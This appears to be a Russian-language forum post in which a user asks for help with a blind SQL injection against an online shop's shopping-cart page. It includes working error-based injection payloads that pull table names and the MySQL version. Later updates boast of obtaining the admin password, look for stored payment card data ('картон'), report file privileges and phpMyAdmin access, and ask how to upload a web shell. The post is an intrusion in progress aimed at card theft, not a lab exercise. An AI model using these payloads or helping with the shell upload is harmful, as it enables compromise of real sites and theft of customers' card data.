Почему в Blind SQL Injection, когда ввожу запрос: xxxx.com/shooping_cart.php?prod_id=(1)and(select+1+from(sel ect+count(*),concat((select+table_name+from+inform ation_schema.tables+limit+0,1),floor(rand(0)*2))x+ from+information_schema.tables+group+by+x)a)--

выводится ошибка:Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

И еще вопрос почему запрос shoping_cart.php?prod_id=22+and+length(@@version)> 1 проходит нормально,

а prod_id=22+and+substring(@@version,1,1)=5 выдает ошибку Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

UPDATE: Разобрался. Надо было использовать конструкцию SUBSTRING(@@version FROM 1 FOR 1)

UPDATE2: Ура! Есть пароль к админке!!! только вот картона в админке нет, хотя есть все продажи. На сайте есть форма вбива картона. Может ли быть что он не сохраняется?

UPDATE3: Ура! В админке есть полноценная SQL инъекция (не блайнд)=))

UPDATE4: Есть доступ к файлам из MySQL (file_priv=Y) как отредактировать php файлы на сервере?

UPDATE5: Откопал доступ к phpmyadmin. Осталось залить шелл. Как залить шелл через PHPmyAdmin?